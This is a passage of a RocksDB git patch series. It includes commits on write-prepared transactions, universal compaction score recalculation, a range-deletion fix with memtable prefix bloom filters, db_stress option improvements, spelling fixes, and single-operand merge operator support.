void TransactionLockMgr::DecrementWaitersImpl( - const PessimisticTransaction* txn, const autovector& wait_ids) { + const PessimisticTransaction* txn, + const autovector& wait_ids) { auto id = txn->GetID(); assert(wait_txn_map_.Contains(id)); wait_txn_map_.Delete(id); @@ -377,7 +379,8 @@ void TransactionLockMgr::DecrementWaitersImpl( } bool TransactionLockMgr::IncrementWaiters( - const PessimisticTransaction* txn, const autovector& wait_ids) { + const PessimisticTransaction* txn, + const autovector& wait_ids) { auto id = txn->GetID(); std::vector queue(txn->GetDeadlockDetectDepth()); std::lock_guard lock(wait_txn_map_mutex_); @@ -537,7 +540,8 @@ void TransactionLockMgr::UnLockKey(const PessimisticTransaction* txn, } } -void TransactionLockMgr::UnLock(PessimisticTransaction* txn, uint32_t column_family_id, +void TransactionLockMgr::UnLock(PessimisticTransaction* txn, + uint32_t column_family_id, const std::string& key, Env* env) { std::shared_ptr lock_map_ptr = GetLockMap(column_family_id); LockMap* lock_map = lock_map_ptr.get(); diff --git a/utilities/transactions/write_prepared_txn.cc b/utilities/transactions/write_prepared_txn.cc index f3942855bf2..211e2172407 100644 --- a/utilities/transactions/write_prepared_txn.cc +++ b/utilities/transactions/write_prepared_txn.cc @@ -14,17 +14,18 @@ #include "rocksdb/db.h" #include "rocksdb/status.h" #include "rocksdb/utilities/transaction_db.h" -#include "utilities/transactions/pessimistic_transaction_db.h" #include "utilities/transactions/pessimistic_transaction.h" +#include "utilities/transactions/pessimistic_transaction_db.h" namespace rocksdb { struct WriteOptions; -WritePreparedTxn::WritePreparedTxn( - TransactionDB* txn_db, const WriteOptions& write_options, - const TransactionOptions& txn_options) - : PessimisticTransaction(txn_db, write_options, txn_options) { +WritePreparedTxn::WritePreparedTxn(WritePreparedTxnDB* txn_db, + const WriteOptions& write_options, + const TransactionOptions& txn_options) + : PessimisticTransaction(txn_db, write_options, txn_options), + wpt_db_(txn_db) { PessimisticTransaction::Initialize(txn_options); } @@ -35,9 +36,18 @@ Status WritePreparedTxn::CommitBatch(WriteBatch* /* unused */) { } Status WritePreparedTxn::PrepareInternal() { - // TODO(myabandeh) Implement this - throw std::runtime_error("Prepare not Implemented"); - return Status::OK(); + WriteOptions write_options = write_options_; + write_options.disableWAL = false; + WriteBatchInternal::MarkEndPrepare(GetWriteBatch()->GetWriteBatch(), name_); + const bool disable_memtable = true; + uint64_t seq_used; + Status s = + db_impl_->WriteImpl(write_options, GetWriteBatch()->GetWriteBatch(), + /*callback*/ nullptr, &log_number_, /*log ref*/ 0, + !disable_memtable, &seq_used); + prepare_seq_ = seq_used; + wpt_db_->AddPrepared(prepare_seq_); + return s; } Status WritePreparedTxn::CommitWithoutPrepareInternal() { @@ -47,9 +57,24 @@ Status WritePreparedTxn::CommitWithoutPrepareInternal() { } Status WritePreparedTxn::CommitInternal() { - // TODO(myabandeh) Implement this - throw std::runtime_error("Commit not Implemented"); - return Status::OK(); + // We take the commit-time batch and append the Commit marker. + // The Memtable will ignore the Commit marker in non-recovery mode + WriteBatch* working_batch = GetCommitTimeWriteBatch(); + // TODO(myabandeh): prevent the users from writing to txn after the prepare + // phase + assert(working_batch->Count() == 0); + WriteBatchInternal::MarkCommit(working_batch, name_); + + // any operations appended to this working_batch will be ignored from WAL + working_batch->MarkWalTerminationPoint(); + + const bool disable_memtable = true; + uint64_t seq_used; + auto s = db_impl_->WriteImpl(write_options_, working_batch, nullptr, nullptr, + log_number_, disable_memtable, &seq_used); + uint64_t& commit_seq = seq_used; + wpt_db_->AddCommitted(prepare_seq_, commit_seq); + return s; } Status WritePreparedTxn::Rollback() { diff --git a/utilities/transactions/write_prepared_txn.h b/utilities/transactions/write_prepared_txn.h index c0feb2207e3..b7cc6ba1b09 100644 --- a/utilities/transactions/write_prepared_txn.h +++ b/utilities/transactions/write_prepared_txn.h @@ -25,13 +25,14 @@ #include "rocksdb/utilities/transaction_db.h" #include "rocksdb/utilities/write_batch_with_index.h" #include "util/autovector.h" -#include "utilities/transactions/transaction_base.h" #include "utilities/transactions/pessimistic_transaction.h" +#include "utilities/transactions/pessimistic_transaction_db.h" +#include "utilities/transactions/transaction_base.h" #include "utilities/transactions/transaction_util.h" namespace rocksdb { -class TransactionDBImpl; +class WritePreparedTxnDB; // This impl could write to DB also uncomitted data and then later tell apart // committed data from uncomitted data. Uncommitted data could be after the @@ -39,8 +40,8 @@ class TransactionDBImpl; // (WriteUnpreparedTxnImpl). class WritePreparedTxn : public PessimisticTransaction { public: - WritePreparedTxn(TransactionDB* db, const WriteOptions& write_options, - const TransactionOptions& txn_options); + WritePreparedTxn(WritePreparedTxnDB* db, const WriteOptions& write_options, + const TransactionOptions& txn_options); virtual ~WritePreparedTxn() {} @@ -65,6 +66,9 @@ class WritePreparedTxn : public PessimisticTransaction { // No copying allowed WritePreparedTxn(const WritePreparedTxn&); void operator=(const WritePreparedTxn&); + + WritePreparedTxnDB* wpt_db_; + uint64_t prepare_seq_; }; } // namespace rocksdb From 1c8dbe2aa20855c0d9322154bd14c0ab65ecd083 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 16 Aug 2017 18:41:18 -0700 Subject: [PATCH 119/205] update scores after picking universal compaction Summary: We forgot to recompute compaction scores after picking a universal compaction like we do in level compaction (https://github.com/facebook/rocksdb/blob/a34b2e388ee51173e44f6aa290f1301c33af9e67/db/compaction_picker.cc#L691-L695). This leads to a fairness issue where we waste compactions on CFs/DB instances that don't need it while others can starve. Previously, ccecf3f4fb8e6eeaa06504b9d477b6db4137831a fixed the issue for the read-amp-based compaction case; this PR avoids the issue earlier and also for size-ratio-based compactions. Closes https://github.com/facebook/rocksdb/pull/2688 Differential Revision: D5566191 Pulled By: ajkr fbshipit-source-id: 010bccb2a107f6a76f3d3022b90aadce5cc48feb --- db/compaction_picker_universal.cc | 1 + db/db_universal_compaction_test.cc | 48 +++++++++++++++++++++++++----- 2 files changed, 41 insertions(+), 8 deletions(-) diff --git a/db/compaction_picker_universal.cc b/db/compaction_picker_universal.cc index ce480267c44..14533fbcdd2 100644 --- a/db/compaction_picker_universal.cc +++ b/db/compaction_picker_universal.cc @@ -373,6 +373,7 @@ Compaction* UniversalCompactionPicker::PickCompaction( c->inputs(0)->size()); RegisterCompaction(c); + vstorage->ComputeCompactionScore(ioptions_, mutable_cf_options); TEST_SYNC_POINT_CALLBACK("UniversalCompactionPicker::PickCompaction:Return", c); diff --git a/db/db_universal_compaction_test.cc b/db/db_universal_compaction_test.cc index ca7ebac8ecd..58fda80d549 100644 --- a/db/db_universal_compaction_test.cc +++ b/db/db_universal_compaction_test.cc @@ -696,17 +696,12 @@ TEST_P(DBTestUniversalCompactionParallel, PickByFileNumberBug) { num_keys -= 100; } - // Wait for the 2nd background compaction process to start - TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:0"); - TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:1"); - - // Hold the 1st and 2nd compaction from finishing + // Hold the 1st compaction from finishing TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:2"); dbfull()->TEST_WaitForCompact(); - // Although 2 compaction threads started, the second one did not compact - // anything because the number of files not being compacted is less than - // level0_file_num_compaction_trigger + // There should only be one picked compaction as the score drops below one + // after the first one is picked. EXPECT_EQ(total_picked_compactions, 1); EXPECT_EQ(TotalTableFiles(), 4); @@ -1411,6 +1406,7 @@ TEST_P(DBTestUniversalCompaction, FullCompactionInBottomPriThreadPool) { ASSERT_EQ(NumSortedRuns(), 1); rocksdb::SyncPoint::GetInstance()->DisableProcessing(); } + Env::Default()->SetBackgroundThreads(0, Env::Priority::BOTTOM); } TEST_P(DBTestUniversalCompaction, ConcurrentBottomPriLowPriCompactions) { @@ -1465,6 +1461,42 @@ TEST_P(DBTestUniversalCompaction, ConcurrentBottomPriLowPriCompactions) { ASSERT_GT(NumTableFilesAtLevel(0), 0); ASSERT_GT(NumTableFilesAtLevel(num_levels_ - 1), 0); rocksdb::SyncPoint::GetInstance()->DisableProcessing(); + Env::Default()->SetBackgroundThreads(0, Env::Priority::BOTTOM); +} + +TEST_P(DBTestUniversalCompaction, RecalculateScoreAfterPicking) { + // Regression test for extra compactions scheduled. Once enough compactions + // have been scheduled to bring the score below one, we should stop + // scheduling more; otherwise, other CFs/DBs may be delayed unnecessarily. + const int kNumFilesTrigger = 8; + Options options = CurrentOptions(); + options.compaction_options_universal.max_merge_width = kNumFilesTrigger / 2; + options.compaction_options_universal.max_size_amplification_percent = + static_cast(-1); + options.compaction_style = kCompactionStyleUniversal; + options.level0_file_num_compaction_trigger = kNumFilesTrigger; + options.num_levels = num_levels_; + options.write_buffer_size = 100 << 10; // 100KB + Reopen(options); + + std::atomic num_compactions_attempted(0); + rocksdb::SyncPoint::GetInstance()->SetCallBack( + "DBImpl::BackgroundCompaction:Start", [&](void* arg) { + ++num_compactions_attempted; + }); + rocksdb::SyncPoint::GetInstance()->EnableProcessing(); + + Random rnd(301); + for (int num = 0; num < kNumFilesTrigger; num++) { + ASSERT_EQ(NumSortedRuns(), num); + int key_idx = 0; + GenerateNewFile(&rnd, &key_idx); + } + dbfull()->TEST_WaitForCompact(); + // Compacting the first four files was enough to bring the score below one so + // there's no need to schedule any more compactions. + ASSERT_EQ(1, num_compactions_attempted); + ASSERT_EQ(NumSortedRuns(), 5); } INSTANTIATE_TEST_CASE_P(UniversalCompactionNumLevels, DBTestUniversalCompaction, From af012c0f830826c115503926d2786edc4d3b2498 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 16 Aug 2017 19:00:46 -0700 Subject: [PATCH 120/205] fix deleterange with memtable prefix bloom Summary: the range delete tombstones in memtable should be added to the aggregator even when the memtable's prefix bloom filter tells us the lookup key's not there. This bug could cause data to temporarily reappear until the memtable containing range deletions is flushed. Reported in #2743. Closes https://github.com/facebook/rocksdb/pull/2745 Differential Revision: D5639007 Pulled By: ajkr fbshipit-source-id: 04fc6facb6f978340a3f639536f4ca7c0d73dfc9 --- HISTORY.md | 1 + db/db_range_del_test.cc | 26 ++++++++++++++++++++++++++ db/memtable.cc | 15 ++++++++------- 3 files changed, 35 insertions(+), 7 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 29f0f3f2701..89e5967569f 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -8,6 +8,7 @@ ### Bug Fixes * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`. * Fix incorrect dropping of deletions during intra-L0 compaction. +* Fix transient reappearance of keys covered by range deletions when memtable prefix bloom filter is enabled. ## 5.7.0 (07/13/2017) ### Public API Change diff --git a/db/db_range_del_test.cc b/db/db_range_del_test.cc index 0288f80bdde..d80c9d14495 100644 --- a/db/db_range_del_test.cc +++ b/db/db_range_del_test.cc @@ -868,6 +868,32 @@ TEST_F(DBRangeDelTest, SubcompactionHasEmptyDedicatedRangeDelFile) { db_->ReleaseSnapshot(snapshot); } +TEST_F(DBRangeDelTest, MemtableBloomFilter) { + // regression test for #2743. the range delete tombstones in memtable should + // be added even when Get() skips searching due to its prefix bloom filter + const int kMemtableSize = 1 << 20; // 1MB + const int kMemtablePrefixFilterSize = 1 << 13; // 8KB + const int kNumKeys = 1000; + const int kPrefixLen = 8; + Options options = CurrentOptions(); + options.memtable_prefix_bloom_size_ratio = + static_cast(kMemtablePrefixFilterSize) / kMemtableSize; + options.prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(kPrefixLen)); + options.write_buffer_size = kMemtableSize; + Reopen(options); + + for (int i = 0; i < kNumKeys; ++i) { + ASSERT_OK(Put(Key(i), "val")); + } + Flush(); + ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), Key(0), + Key(kNumKeys))); + for (int i = 0; i < kNumKeys; ++i) { + std::string value; + ASSERT_TRUE(db_->Get(ReadOptions(), Key(i), &value).IsNotFound()); + } +} + #endif // ROCKSDB_LITE } // namespace rocksdb diff --git a/db/memtable.cc b/db/memtable.cc index efea6199af2..a24989123b3 100644 --- a/db/memtable.cc +++ b/db/memtable.cc @@ -643,6 +643,14 @@ bool MemTable::Get(const LookupKey& key, std::string* value, Status* s, } PERF_TIMER_GUARD(get_from_memtable_time); + std::unique_ptr range_del_iter( + NewRangeTombstoneIterator(read_opts)); + Status status = range_del_agg->AddTombstones(std::move(range_del_iter)); + if (!status.ok()) { + *s = status; + return false; + } + Slice user_key = key.user_key(); bool found_final_value = false; bool merge_in_progress = s->IsMergeInProgress(); @@ -658,13 +666,6 @@ bool MemTable::Get(const LookupKey& key, std::string* value, Status* s, if (prefix_bloom_) { PERF_COUNTER_ADD(bloom_memtable_hit_count, 1); } - std::unique_ptr range_del_iter( - NewRangeTombstoneIterator(read_opts)); - Status status = range_del_agg->AddTombstones(std::move(range_del_iter)); - if (!status.ok()) { - *s = status; - return false; - } Saver saver; saver.status = s; saver.found_final_value = &found_final_value; From 23593171c42e88ea1c6d288dd1ab6f2b65bdbbe1 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 16 Aug 2017 19:03:18 -0700 Subject: [PATCH 121/205] minor improvements to db_stress Summary: fix some things that made this command hard to use from CLI: - use default values for `target_file_size_base` and `max_bytes_for_level_base`. previously we were using small values for these but default value of `write_buffer_size`, which led to enormous number of L1 files. - failure message for `value_size_mult` too big. previously there was just an assert, so in non-debug mode it'd overrun the value buffer and crash mysteriously. - only print verification success if there's no failure. before it'd print both in the failure case. - support `memtable_prefix_bloom_size_ratio` - support `num_bottom_pri_threads` (universal compaction) Closes https://github.com/facebook/rocksdb/pull/2741 Differential Revision: D5629495 Pulled By: ajkr fbshipit-source-id: ddad97d6d4ba0884e7c0f933b0a359712514fc1d --- tools/db_stress.cc | 42 ++++++++++++++++++++++++++++++++++-------- 1 file changed, 34 insertions(+), 8 deletions(-) diff --git a/tools/db_stress.cc b/tools/db_stress.cc index c7153f2e943..7a4837f18e6 100644 --- a/tools/db_stress.cc +++ b/tools/db_stress.cc @@ -72,6 +72,8 @@ using GFLAGS::RegisterFlagValidator; using GFLAGS::SetUsageMessage; static const long KB = 1024; +static const int kRandomValueMaxFactor = 3; +static const int kValueMaxLen = 100; static bool ValidateUint32Range(const char* flagname, uint64_t value) { if (value > std::numeric_limits::max()) { @@ -174,6 +176,11 @@ DEFINE_int32(max_write_buffer_number_to_maintain, "after they are flushed. If this value is set to -1, " "'max_write_buffer_number' will be used."); +DEFINE_double(memtable_prefix_bloom_size_ratio, + rocksdb::Options().memtable_prefix_bloom_size_ratio, + "creates prefix blooms for memtables, each with size " + "`write_buffer_size * memtable_prefix_bloom_size_ratio`."); + DEFINE_int32(open_files, rocksdb::Options().max_open_files, "Maximum number of files to keep open at the same time " "(use default if == 0)"); @@ -205,6 +212,10 @@ DEFINE_int32(max_background_compactions, "The maximum number of concurrent background compactions " "that can occur in parallel."); +DEFINE_int32(num_bottom_pri_threads, 0, + "The number of threads in the bottom-priority thread pool (used " + "by universal compaction only)."); + DEFINE_int32(compaction_thread_pool_adjust_interval, 0, "The interval (in milliseconds) to adjust compaction thread pool " "size. Don't change it periodically if the value is 0."); @@ -317,13 +328,15 @@ extern std::vector rocksdb_kill_prefix_blacklist; DEFINE_bool(disable_wal, false, "If true, do not write WAL for write."); -DEFINE_int32(target_file_size_base, 64 * KB, +DEFINE_int32(target_file_size_base, rocksdb::Options().target_file_size_base, "Target level-1 file size for compaction"); DEFINE_int32(target_file_size_multiplier, 1, "A multiplier to compute target level-N file size (N >= 2)"); -DEFINE_uint64(max_bytes_for_level_base, 256 * KB, "Max bytes for level-1"); +DEFINE_uint64(max_bytes_for_level_base, + rocksdb::Options().max_bytes_for_level_base, + "Max bytes for level-1"); DEFINE_double(max_bytes_for_level_multiplier, 2, "A multiplier to compute max bytes for level-N (N >= 2)"); @@ -1121,8 +1134,6 @@ class StressTest { ToString(FLAGS_write_buffer_size / 4), ToString(FLAGS_write_buffer_size / 8), }}, - {"memtable_prefix_bloom_bits", {"0", "8", "10"}}, - {"memtable_prefix_bloom_probes", {"4", "5", "6"}}, {"memtable_huge_page_size", {"0", ToString(2 * 1024 * 1024)}}, {"max_successive_merges", {"0", "2", "4"}}, {"inplace_update_num_locks", {"100", "200", "300"}}, @@ -1250,7 +1261,7 @@ class StressTest { threads[i] = nullptr; } auto now = FLAGS_env->NowMicros(); - if (!FLAGS_test_batches_snapshots) { + if (!FLAGS_test_batches_snapshots && !shared.HasVerificationFailedYet()) { fprintf(stdout, "%s Verification successful\n", FLAGS_env->TimeToString(now/1000000).c_str()); } @@ -2021,7 +2032,7 @@ class StressTest { return false; } // compare value_from_db with the value in the shared state - char value[100]; + char value[kValueMaxLen]; uint32_t value_base = shared->Get(cf, key); if (value_base == SharedState::SENTINEL && !strict) { return true; @@ -2064,7 +2075,8 @@ class StressTest { } static size_t GenerateValue(uint32_t rand, char *v, size_t max_sz) { - size_t value_sz = ((rand % 3) + 1) * FLAGS_value_size_mult; + size_t value_sz = + ((rand % kRandomValueMaxFactor) + 1) * FLAGS_value_size_mult; assert(value_sz <= max_sz && value_sz >= sizeof(uint32_t)); *((uint32_t*)v) = rand; for (size_t i=sizeof(uint32_t); i < value_sz; i++) { @@ -2162,6 +2174,8 @@ class StressTest { FLAGS_min_write_buffer_number_to_merge; options_.max_write_buffer_number_to_maintain = FLAGS_max_write_buffer_number_to_maintain; + options_.memtable_prefix_bloom_size_ratio = + FLAGS_memtable_prefix_bloom_size_ratio; options_.max_background_compactions = FLAGS_max_background_compactions; options_.max_background_flushes = FLAGS_max_background_flushes; options_.compaction_style = @@ -2406,7 +2420,8 @@ int main(int argc, char** argv) { // The number of background threads should be at least as much the // max number of concurrent compactions. FLAGS_env->SetBackgroundThreads(FLAGS_max_background_compactions); - + FLAGS_env->SetBackgroundThreads(FLAGS_num_bottom_pri_threads, + rocksdb::Env::Priority::BOTTOM); if (FLAGS_prefixpercent > 0 && FLAGS_prefix_size <= 0) { fprintf(stderr, "Error: prefixpercent is non-zero while prefix_size is " @@ -2419,6 +2434,12 @@ int main(int argc, char** argv) { "test_batches_snapshots test!\n"); exit(1); } + if (FLAGS_memtable_prefix_bloom_size_ratio > 0.0 && FLAGS_prefix_size <= 0) { + fprintf(stderr, + "Error: please specify positive prefix_size in order to use " + "memtable_prefix_bloom_size_ratio\n"); + exit(1); + } if ((FLAGS_readpercent + FLAGS_prefixpercent + FLAGS_writepercent + FLAGS_delpercent + FLAGS_delrangepercent + FLAGS_iterpercent) != 100) { @@ -2450,6 +2471,11 @@ int main(int argc, char** argv) { } else if (FLAGS_active_width == 0) { FLAGS_active_width = FLAGS_max_key; } + if (FLAGS_value_size_mult * kRandomValueMaxFactor > kValueMaxLen) { + fprintf(stderr, "Error: value_size_mult can be at most %d\n", + kValueMaxLen / kRandomValueMaxFactor); + exit(1); + } // Choose a location for the test database if none given with --db= if (FLAGS_db.empty()) { From ac8fb77afd669f399e084a338d620c0a6cff827e Mon Sep 17 00:00:00 2001 From: follitude Date: Wed, 16 Aug 2017 21:45:32 -0700 Subject: [PATCH 122/205] fix some misspellings Summary: PTAL ajkr Closes https://github.com/facebook/rocksdb/pull/2750 Differential Revision: D5648052 Pulled By: ajkr fbshipit-source-id: 7cd1ddd61364d5a55a10fdd293fa74b2bf89dd98 --- db/db_impl_write.cc | 2 +- options/cf_options.h | 2 +- utilities/blob_db/blob_db_test.cc | 4 ++-- utilities/transactions/pessimistic_transaction_db.cc | 2 +- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc index 512819772ea..8a11948f7e3 100644 --- a/db/db_impl_write.cc +++ b/db/db_impl_write.cc @@ -1081,7 +1081,7 @@ Status DBImpl::SwitchMemtable(ColumnFamilyData* cfd, WriteContext* context) { SuperVersion* new_superversion = nullptr; const MutableCFOptions mutable_cf_options = *cfd->GetLatestMutableCFOptions(); - // Set current_memtble_info for memtable sealed callback + // Set memtable_info for memtable sealed callback #ifndef ROCKSDB_LITE MemTableInfo memtable_info; memtable_info.cf_name = cfd->GetName(); diff --git a/options/cf_options.h b/options/cf_options.h index df5b460fc73..f376729f853 100644 --- a/options/cf_options.h +++ b/options/cf_options.h @@ -83,7 +83,7 @@ struct ImmutableCFOptions { bool advise_random_on_open; // This options is required by PlainTableReader. May need to move it - // to PlainTalbeOptions just like bloom_bits_per_key + // to PlainTableOptions just like bloom_bits_per_key uint32_t bloom_locality; bool purge_redundant_kvs_while_flush; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 28d4d5b8dea..be42c395b9d 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -617,7 +617,7 @@ TEST_F(BlobDBTest, GCAfterOverwriteKeys) { VerifyDB(data); } -TEST_F(BlobDBTest, GCRelocateKeyWhileOverwritting) { +TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { Random rnd(301); BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; @@ -650,7 +650,7 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwritting) { VerifyDB({{"foo", "v2"}}); } -TEST_F(BlobDBTest, GCExpiredKeyWhileOverwritting) { +TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { Random rnd(301); Options options; options.env = mock_env_.get(); diff --git a/utilities/transactions/pessimistic_transaction_db.cc b/utilities/transactions/pessimistic_transaction_db.cc index 156e7a12b0d..08b0dfa7ba4 100644 --- a/utilities/transactions/pessimistic_transaction_db.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -332,7 +332,7 @@ Transaction* PessimisticTransactionDB::BeginInternalTransaction( // All user Put, Merge, Delete, and Write requests must be intercepted to make // sure that they lock all keys that they are writing to avoid causing conflicts -// with any concurent transactions. The easiest way to do this is to wrap all +// with any concurrent transactions. The easiest way to do this is to wrap all // write operations in a transaction. // // Put(), Merge(), and Delete() only lock a single key per call. Write() will From 9a44b4c32c5dd472b8c8dc76289342055da8bfc4 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Wed, 16 Aug 2017 23:38:04 -0700 Subject: [PATCH 123/205] Allow merge operator to be called even with a single operand Summary: Added a function `MergeOperator::DoesAllowSingleMergeOperand()` to allow invoking a merge operator even with a single merge operand, if overriden. This is needed for Cassandra-on-RocksDB work. All Cassandra writes are through merges and this will allow a single merge-value to be updated in the merge-operator invoked via a compaction, if needed, due to an expired TTL. Closes https://github.com/facebook/rocksdb/pull/2721 Differential Revision: D5608706 Pulled By: sagar0 fbshipit-source-id: f299f9f91c4d1ac26e48bd5906e122c1c5e5f3fc --- HISTORY.md | 1 + db/compaction_iterator_test.cc | 105 +++++++++++++++++++++++++++++++ db/merge_helper.cc | 30 ++++++++- db/merge_helper.h | 18 +----- include/rocksdb/merge_operator.h | 7 +++ 5 files changed, 144 insertions(+), 17 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 89e5967569f..fc6c55874db 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -4,6 +4,7 @@ * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. * Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. * Universal compactions including the bottom level can be executed in a dedicated thread pool. This alleviates head-of-line blocking in the compaction queue, which cause write stalling, particularly in multi-instance use cases. Users can enable this feature via `Env::SetBackgroundThreads(N, Env::Priority::BOTTOM)`, where `N > 0`. +* Allow merge operator to be called even with a single merge operand during compactions, by appropriately overriding `MergeOperator::AllowSingleOperand`. ### Bug Fixes * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`. diff --git a/db/compaction_iterator_test.cc b/db/compaction_iterator_test.cc index b625c99ffaa..dfc4139363b 100644 --- a/db/compaction_iterator_test.cc +++ b/db/compaction_iterator_test.cc @@ -455,6 +455,111 @@ TEST_F(CompactionIteratorTest, ShuttingDownInMerge) { EXPECT_EQ(2, filter.last_seen.load()); } +TEST_F(CompactionIteratorTest, SingleMergeOperand) { + class Filter : public CompactionFilter { + virtual Decision FilterV2(int level, const Slice& key, ValueType t, + const Slice& existing_value, + std::string* new_value, + std::string* skip_until) const override { + std::string k = key.ToString(); + std::string v = existing_value.ToString(); + + // See InitIterators() call below for the sequence of keys and their + // filtering decisions. Here we closely assert that compaction filter is + // called with the expected keys and only them, and with the right values. + if (k == "a") { + EXPECT_EQ(ValueType::kMergeOperand, t); + EXPECT_EQ("av1", v); + return Decision::kKeep; + } else if (k == "b") { + EXPECT_EQ(ValueType::kMergeOperand, t); + return Decision::kKeep; + } else if (k == "c") { + return Decision::kKeep; + } + + ADD_FAILURE(); + return Decision::kKeep; + } + + const char* Name() const override { + return "CompactionIteratorTest.SingleMergeOperand::Filter"; + } + }; + + class SingleMergeOp : public MergeOperator { + public: + bool FullMergeV2(const MergeOperationInput& merge_in, + MergeOperationOutput* merge_out) const override { + // See InitIterators() call below for why "c" is the only key for which + // FullMergeV2 should be called. + EXPECT_EQ("c", merge_in.key.ToString()); + + std::string temp_value; + if (merge_in.existing_value != nullptr) { + temp_value = merge_in.existing_value->ToString(); + } + + for (auto& operand : merge_in.operand_list) { + temp_value.append(operand.ToString()); + } + merge_out->new_value = temp_value; + + return true; + } + + bool PartialMergeMulti(const Slice& key, + const std::deque& operand_list, + std::string* new_value, + Logger* logger) const override { + std::string string_key = key.ToString(); + EXPECT_TRUE(string_key == "a" || string_key == "b"); + + if (string_key == "a") { + EXPECT_EQ(1, operand_list.size()); + } else if (string_key == "b") { + EXPECT_EQ(2, operand_list.size()); + } + + std::string temp_value; + for (auto& operand : operand_list) { + temp_value.append(operand.ToString()); + } + swap(temp_value, *new_value); + + return true; + } + + const char* Name() const override { + return "CompactionIteratorTest SingleMergeOp"; + } + + bool AllowSingleOperand() const override { return true; } + }; + + SingleMergeOp merge_op; + Filter filter; + InitIterators( + // a should invoke PartialMergeMulti with a single merge operand. + {test::KeyStr("a", 50, kTypeMerge), + // b should invoke PartialMergeMulti with two operands. + test::KeyStr("b", 70, kTypeMerge), test::KeyStr("b", 60, kTypeMerge), + // c should invoke FullMerge due to kTypeValue at the beginning. + test::KeyStr("c", 90, kTypeMerge), test::KeyStr("c", 80, kTypeValue)}, + {"av1", "bv2", "bv1", "cv2", "cv1"}, {}, {}, kMaxSequenceNumber, + &merge_op, &filter); + + c_iter_->SeekToFirst(); + ASSERT_TRUE(c_iter_->Valid()); + ASSERT_EQ(test::KeyStr("a", 50, kTypeMerge), c_iter_->key().ToString()); + ASSERT_EQ("av1", c_iter_->value().ToString()); + c_iter_->Next(); + ASSERT_TRUE(c_iter_->Valid()); + ASSERT_EQ("bv1bv2", c_iter_->value().ToString()); + c_iter_->Next(); + ASSERT_EQ("cv1cv2", c_iter_->value().ToString()); +} + } // namespace rocksdb int main(int argc, char** argv) { diff --git a/db/merge_helper.cc b/db/merge_helper.cc index 625de27c2b5..55f8254cf0d 100644 --- a/db/merge_helper.cc +++ b/db/merge_helper.cc @@ -18,6 +18,33 @@ namespace rocksdb { +MergeHelper::MergeHelper(Env* env, const Comparator* user_comparator, + const MergeOperator* user_merge_operator, + const CompactionFilter* compaction_filter, + Logger* logger, bool assert_valid_internal_key, + SequenceNumber latest_snapshot, int level, + Statistics* stats, + const std::atomic* shutting_down) + : env_(env), + user_comparator_(user_comparator), + user_merge_operator_(user_merge_operator), + compaction_filter_(compaction_filter), + shutting_down_(shutting_down), + logger_(logger), + assert_valid_internal_key_(assert_valid_internal_key), + allow_single_operand_(false), + latest_snapshot_(latest_snapshot), + level_(level), + keys_(), + filter_timer_(env_), + total_filter_time_(0U), + stats_(stats) { + assert(user_comparator_ != nullptr); + if (user_merge_operator_) { + allow_single_operand_ = user_merge_operator_->AllowSingleOperand(); + } +} + Status MergeHelper::TimedFullMerge(const MergeOperator* merge_operator, const Slice& key, const Slice* value, const std::vector& operands, @@ -288,7 +315,8 @@ Status MergeHelper::MergeUntil(InternalIterator* iter, // Attempt to use the user's associative merge function to // merge the stacked merge operands into a single operand. s = Status::MergeInProgress(); - if (merge_context_.GetNumOperands() >= 2) { + if (merge_context_.GetNumOperands() >= 2 || + (allow_single_operand_ && merge_context_.GetNumOperands() == 1)) { bool merge_success = false; std::string merge_result; { diff --git a/db/merge_helper.h b/db/merge_helper.h index 59da47a6b0b..b9ef12a4cff 100644 --- a/db/merge_helper.h +++ b/db/merge_helper.h @@ -34,22 +34,7 @@ class MergeHelper { const CompactionFilter* compaction_filter, Logger* logger, bool assert_valid_internal_key, SequenceNumber latest_snapshot, int level = 0, Statistics* stats = nullptr, - const std::atomic* shutting_down = nullptr) - : env_(env), - user_comparator_(user_comparator), - user_merge_operator_(user_merge_operator), - compaction_filter_(compaction_filter), - shutting_down_(shutting_down), - logger_(logger), - assert_valid_internal_key_(assert_valid_internal_key), - latest_snapshot_(latest_snapshot), - level_(level), - keys_(), - filter_timer_(env_), - total_filter_time_(0U), - stats_(stats) { - assert(user_comparator_ != nullptr); - } + const std::atomic* shutting_down = nullptr); // Wrapper around MergeOperator::FullMergeV2() that records perf statistics. // Result of merge will be written to result if status returned is OK. @@ -158,6 +143,7 @@ class MergeHelper { const std::atomic* shutting_down_; Logger* logger_; bool assert_valid_internal_key_; // enforce no internal key corruption? + bool allow_single_operand_; SequenceNumber latest_snapshot_; int level_; diff --git a/include/rocksdb/merge_operator.h b/include/rocksdb/merge_operator.h index 5fe3e0bfda8..f2947100553 100644 --- a/include/rocksdb/merge_operator.h +++ b/include/rocksdb/merge_operator.h @@ -183,6 +183,13 @@ 